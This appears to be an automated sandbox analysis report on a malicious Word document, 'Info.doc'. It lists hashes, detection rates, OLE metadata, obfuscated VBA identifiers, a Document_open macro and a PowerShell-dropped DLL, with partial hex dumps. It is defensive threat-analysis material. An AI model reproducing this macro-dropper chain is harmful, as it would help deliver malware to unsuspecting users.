                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:false
                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KYWZL3X0W8OQ8ETTUVJQ.temp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8016
                                            Entropy (8bit):3.5889732684522677
                                            Encrypted:false
                                            SSDEEP:96:chQCsMqftMqvsqvJCwoBz8hQCsMqftMqvsEHyqvJCwor/zkCYftJHyf8RAt+lUVp:cy3oBz8y7Hnor/zkcf8RGIu
                                            MD5:1F5286C6B9A1444692440810FD19B2C9
                                            SHA1:4B7CA2CE20A7A8AD67823656B8DF6FEC7EE90573
                                            SHA-256:852C0A1E1BD428383519D614FE220140CE7A9B2A6F746B5AD6D8200B6D3521D5
                                            SHA-512:FA46091F99D7DA89EAE989C96603E0E394381D2139590145B96DCC420CBA199107C85FF0A737949FDAE627CF021DBAC4F2C6CAD1B8FF27A2712A2E945C6D5287
                                            Malicious:false
                                            Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            C:\Users\user\Desktop\~$Info.doc
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                            MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                            SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                            SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                            SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                            Malicious:true
                                            Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                            C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):239104
                                            Entropy (8bit):7.444820981958587
                                            Encrypted:false
                                            SSDEEP:3072:KC1sUJsEIo9CTFM5/A8eWLdlU8thEnYsqibnjPw+a5DIYvK8UIDoQQh3:KC1NJMo9ywAkdrHEn1qibjm5DIYSX
                                            MD5:A70E2124BF6F6A1CF51F69890A88AFF7
                                            SHA1:3652F6EEAA620CB1627A255D25A83A7365AEB3CF
                                            SHA-256:2ED12B3974BE2D729CB7EFDDDFCED6B61E5B00A56EBE27A6CF3FBB080880F2F0
                                            SHA-512:34EF461231752E5E907BF1DB82BA3E6B8CC6AEA6406756DD60D856ECB9EEA47F89D249A5AAEF7AFFF1E4556282F8EBDBA39C9C496D579451585C688C51169FB2
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 93%
                                            Joe Sandbox View:
                                            • Filename: List 2020_12_21 OZV3903.doc, Detection: malicious, Browse
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.LC.."..."...".......".....a."...#.d.".:4Y...".....%.".......".......".......".Rich..".........................PE..L....H._...........!.....J...X......uz.......`......................................................................p...I.......<......................................................................@............`..\............................text...wH.......J.................. ..`.rdata...G...`...H...N..............@..@.data....2..........................@....rsrc...............................@..@.reloc...#.......$..................@..B........................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Granite Kids & Beauty Director portals interface well-modulated white Web robust Wyoming Lodge database action-items, Author: Matto Carpentier, Template: Normal.dotm, Last Saved By: Maxime Marchal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 21 12:42:00 2020, Last Saved Time/Date: Mon Dec 21 12:43:00 2020, Number of Pages: 1, Number of Words: 5817, Number of Characters: 33163, Security: 8
                                            Entropy (8bit):6.401011099571846
                                            TrID:
                                            • Microsoft Word document (32009/1) 54.23%
                                            • Microsoft Word document (old ver.) (19008/1) 32.20%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                            File name:Info.doc
                                            File size:205804
                                            MD5:37f5e7c688b8b8f664a9c8430f994f9f
                                            SHA1:98bd3f717551017517c306bd6d429f5d410a5dcd
                                            SHA256:ab0d8e587ebfbed00f0e6aaf7d82e4d60cb3140c983820f25192303cce71828d
                                            SHA512:f6b9e9d3ab7d96011d717e8783d0f1104dc929908bfe11ae405df6dcaa591afbb11917b3d9915efcfca0c662c468104ecdc2626bf9914f7791668c6339dfcb2b
                                            SSDEEP:3072:fm9ufstRUUKSns8T00JSHUgteMJ8qMD7gJ/LLr3DWaUsWB/1i1W5:fm9ufsfgIf0pLNLr3DWaUsWB/1i1W5
                                            File Content Preview:........................>.......................8...........;...............5...6...7..........................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea2aaa4b4b4a4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "Info.doc"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Office Word
                                            Encrypted Document:False
                                            Contains Word Document Stream:True
                                            Contains Workbook/Book Stream:False
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1252
                                            Title:
                                            Subject:Granite Kids & Beauty Director portals interface well-modulated white Web robust Wyoming Lodge database action-items
                                            Author:Matto Carpentier
                                            Keywords:
                                            Comments:
                                            Template:Normal.dotm
                                            Last Saved By:Maxime Marchal
                                            Revion Number:1
                                            Total Edit Time:0
                                            Create Time:2020-12-21 12:42:00
                                            Last Saved Time:2020-12-21 12:43:00
                                            Number of Pages:1
                                            Number of Words:5817
                                            Number of Characters:33163
                                            Creating Application:Microsoft Office Word
                                            Security:8

                                            Document Summary

                                            Document Code Page:1252
                                            Number of Lines:276
                                            Number of Paragraphs:77
                                            Thumbnail Scaling Desired:False
                                            Company:
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:983040

                                            Streams with VBA

                                            VBA File Name: UserForm1, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm1
                                            VBA File Name:UserForm1
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm2, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm2
                                            VBA File Name:UserForm2
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm3, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm3
                                            VBA File Name:UserForm3
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_GlobalNameSpace
                                            VBA Code
                                            VBA File Name: UserForm4, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm4
                                            VBA File Name:UserForm4
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_PredeclaredId
                                            VBA Code
                                            VBA File Name: UserForm5, Stream Size: -1
                                            General
                                            Stream Path:Macros/UserForm5
                                            VBA File Name:UserForm5
                                            Stream Size:-1
                                            Data ASCII:
                                            Data Raw:

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: E2ajbo3kwzka_d5z, Stream Size: 16774
                                            General
                                            Stream Path:Macros/VBA/E2ajbo3kwzka_d5z
                                            VBA File Name:E2ajbo3kwzka_d5z
                                            Stream Size:16774
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . / ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 07 30 00 00 00 00 00 00 01 00 00 00 cf ca 2f 29 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            "VmRVq.KguiplAD.CnKiJF"
                                            "mzbFCI.GqJWEXfB.IvEKh"
                                            ucksgAUED:
                                            VBA.Replace
                                            uCVFE:
                                            "PmlaEBCKi.aDNDiMEJF.HRUaFG"
                                            iZUiFEo
                                            "CSCUFAFCH.oVuLMa.FDGwJI"
                                            "VfIgjBIoD.XIcEF.mFxsSHhAy"
                                            MESgwEGs
                                            MTyfRH:
                                            "hAvFE.gNtOmJDDT.siHEJeBA"
                                            NwMaf
                                            hETyJRC
                                            IKCKmEI
                                            RUUlSIJ:
                                            VkyUFvAQ
                                            rdrMCIAI:
                                            zaqJLXHQB
                                            "jOtlAwLFD.EPAwGZvBC.pUffcye"
                                            "lnPdDhJC.bMciHAJ.kIbmrrwDE"
                                            vSlzf
                                            HceDHSBT:
                                            qYwhDUHUF
                                            EuQQU
                                            "xLbyBD.pNkya.qglyExEmD"
                                            cJGuSk
                                            yalsFI
                                            Binary
                                            dPGglCDI:
                                            bouyw
                                            lvBsE
                                            leAgdGL
                                            RUUlSIJ
                                            DmMFDGCIF
                                            fmpgIxE:
                                            uLayA
                                            HYgzEeH
                                            "NpfgFB.swoqfAC.AFkyDu"
                                            "QwOYIGHEH.SsghfXE.YpOECuE"
                                            WJlmFA:
                                            VoNcJE:
                                            DUkLHBE:
                                            wCHUJBF
                                            dxDqp:
                                            "pSUNGJ.rEyzmGIR.fKJzEGHlF"
                                            myZqF
                                            dAShIZ:
                                            "JoHvcaI.biuHE.OZMIY"
                                            abhpAG
                                            HceDHSBT
                                            "BkHxEBSFC.tMDBCAjtA.myOVCD"
                                            PlqIc
                                            trDhHH
                                            DUkLHBE
                                            VKdzoIA
                                            UJcNvrEMZ
                                            lflcCFHEH
                                            FxjMHFEG
                                            "tMWRDBD.PyMcSJCX.kuvBCEHCD"
                                            RXeMIz:
                                            Resume
                                            dxDqp
                                            "FjaGBJD.lxqCCEgBC.CThwUDHH"
                                            QDtIAa:
                                            "NjzoeAJI.ztQWICBD.UTsHBG"
                                            VhXlcAJ:
                                            jAJhFSDd
                                            "YGKua.nyqsJIB.FjjfGW"
                                            fOvrJBC
                                            RXeMIz
                                            "mYzOEQ.wEPPAQ.OlfMCJcBC"
                                            fmfXCB
                                            "mSEwGDrGG.JckHGA.TsUQZBs"
                                            "gytle.JmmNxgNA.gdskNAE"
                                            "syQPwEAB.eviMHXYJl.cygawhk"
                                            "LFrSmGw.TUJWGBq.NKVOUHDA"
                                            "FvUEEEB.bLVmn.UfOUHBQAV"
                                            jkpHCa
                                            MXUnJ:
                                            RMTXE
                                            AWPVuW:
                                            VKdzoIA:
                                            xcBKDBDWs
                                            wrBfaHFGi
                                            wBoOSH
                                            "eaoMpHk.BWPawm.joOPFH"
                                            zYNBD
                                            ChrW(wdKeyS)
                                            "LRnCyHk.hKQdhFCE.PBZNCEB"
                                            NYwMEt:
                                            leAgdGL:
                                            AWObErp
                                            bouyw:
                                            oQmyHt
                                            "sDMKJ.xLJHFBHe.PFsFiCCU"
                                            XprAmJ
                                            "OLJmEGA.vvoDIDIHc.xmHyGaeH"
                                            PhyKAJCf:
                                            dPGglCDI
                                            fEgLs
                                            yalsFI:
                                            CCsSFE:
                                            VB_Name
                                            xDafahA
                                            qAGhBZGOD
                                            VoNcJE
                                            pVusMEAHH
                                            ucksgAUED
                                            "zCvHB.Rakno.kCsoG"
                                            IBUfCf
                                            jkpHCa:
                                            jAJhFSDd:
                                            enARs:
                                            qAGhBZGOD:
                                            OjIBIirQH:
                                            kdcmxDAC:
                                            Error
                                            MXUnJ
                                            AWObErp:
                                            qWvjf
                                            vgRkI
                                            uCVFE
                                            xcBKDBDWs:
                                            iRmjYCJ:
                                            ioBaJ
                                            "crGHzAx.HRIOAE.kssuvIO"
                                            myZqF:
                                            mewiyE
                                            lOUng:
                                            VhXlcAJ
                                            hyoLCIB
                                            eSNRABD
                                            MESgwEGs:
                                            iRmjYCJ
                                            zkHRAHIHB
                                            lOUng
                                            EqMlCIDJE:
                                            eEBhP
                                            dAShIZ
                                            "WjGFr.CrdbdTP.KiDXJmC"
                                            fmpgIxE
                                            EqMlCIDJE
                                            WJlmFA
                                            enARs
                                            tzSIVA
                                            bMnEJ
                                            AWPVuW
                                            aPdrkaA
                                            xDafahA:
                                            "lHJfDH.npGBJms.SplDCEi"
                                            zkHRAHIHB:
                                            ONaTAGBtA
                                            OjIBIirQH
                                            MqlOHPQt
                                            rdrMCIAI
                                            "MYRHGEaI.QUycBC.dasNEIHT"
                                            Function
                                            vgRkI:
                                            LRONHDFBS
                                            BBsKIJkGJ:
                                            "ndnHDEJE.UiIxEHJJJ.qWURLCtF"
                                            fOvrJBC:
                                            PhyKAJCf
                                            "ZIEUAI.TJwaDyO.bsYzwJD"
                                            NYwMEt
                                            criwDE
                                            nwGAclAy
                                            "ccnvJJzA.VjfdtwDF.pUMgodC"
                                            VczvEJEA:
                                            QDtIAa
                                            CCsSFE
                                            fmfXCB:
                                            DJLVngj
                                            KxdEVTl
                                            "OyaElDCE.UpHzEp.iyQRbJCJU"
                                            "IIggVF.dxYJC.nWtxqJXiN"
                                            YxrfC:
                                            MRhwSdA
                                            lTjwD
                                            JyRZCQ
                                            BBsKIJkGJ
                                            AyCGHCJA
                                            "QKcQFx.oVrwjBAD.ZlujE"
                                            String
                                            atDHBJx
                                            KXGTl
                                            "JpgcAFBJl.BluQGJBo.HLIdIFFcG"
                                            NXAzADuD
                                            "rMFaDBIH.tLIPEJ.hpnWBFGJ"
                                            gcygJGHEJ
                                            YxrfC
                                            XFEjEBSHJ
                                            "JdDRkqFq.LxQSvJIP.lkDUG"
                                            "aNPTEC.yoVhAA.FdUyoLiD"
                                            "zLHaBG.FJohjH.BGnEgEcBE"
                                            tzSIVA:
                                            abhpAG:
                                            "VvQCyHBA.dtCSGGyCG.ELwqFIJ"
                                            "wYRQDIH.fYeTVlIA.JTtGsGq"
                                            VczvEJEA
                                            "XxVUI.llKCOzCBB.sYhxmD"
                                            "OTrKFG.tIiOI.EVNCHhAE"
                                            "cRFcI.VXpPGO.JCphFj"
                                            kdcmxDAC
                                            wHzTDbw
                                            qYwhDUHUF:
                                            cLEdnSIFI
                                            Attribute
                                            Close
                                            wkxaA
                                            AyCGHCJA:
                                            bMnEJ:
                                            "ZCyVJoj.creOBB.daPhFoG"
                                            teqYIiCD
                                            nwGAclAy:
                                            KVVwHDdH
                                            wkxaA:
                                            fEgLs:
                                            "BvoseJVlC.DndgzH.mKMEEDrQr"
                                            aIrZTje
                                            MTyfRH
                                            "EaHweM.UDfoBCnv.OyqDF"
                                            RFpbBhv
                                            "vlJqH.UtTqAoBFI.ftWSDNJ"
                                            "jADhGiFIX.msdcqAi.XOHIAJ"
                                            VBA Code
                                            VBA File Name: J84qpb_vkjnc1hq, Stream Size: 1116
                                            General
                                            Stream Path:Macros/VBA/J84qpb_vkjnc1hq
                                            VBA File Name:J84qpb_vkjnc1hq
                                            Stream Size:1116
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 cf ca 98 d1 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: Qtep_eof7eoc0a, Stream Size: 683
                                            General
                                            Stream Path:Macros/VBA/Qtep_eof7eoc0a
                                            VBA File Name:Qtep_eof7eoc0a
                                            Stream Size:683
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 cf ca db f8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code
                                            VBA File Name: UserForm1, Stream Size: 1159
                                            General
                                            Stream Path:Macros/VBA/UserForm1
                                            VBA File Name:UserForm1
                                            Stream Size:1159
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca 17 e0 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm2, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm2
                                            VBA File Name:UserForm2
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . N K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca 4e 4b 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm3, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm3
                                            VBA File Name:UserForm3
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca c2 ba 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_GlobalNameSpace
                                            VBA Code
                                            VBA File Name: UserForm4, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm4
                                            VBA File Name:UserForm4
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca f5 63 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_PredeclaredId
                                            VBA Code
                                            VBA File Name: UserForm5, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm5
                                            VBA File Name:UserForm5
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca 83 cc 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:114
                                            Entropy:4.2359563651
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
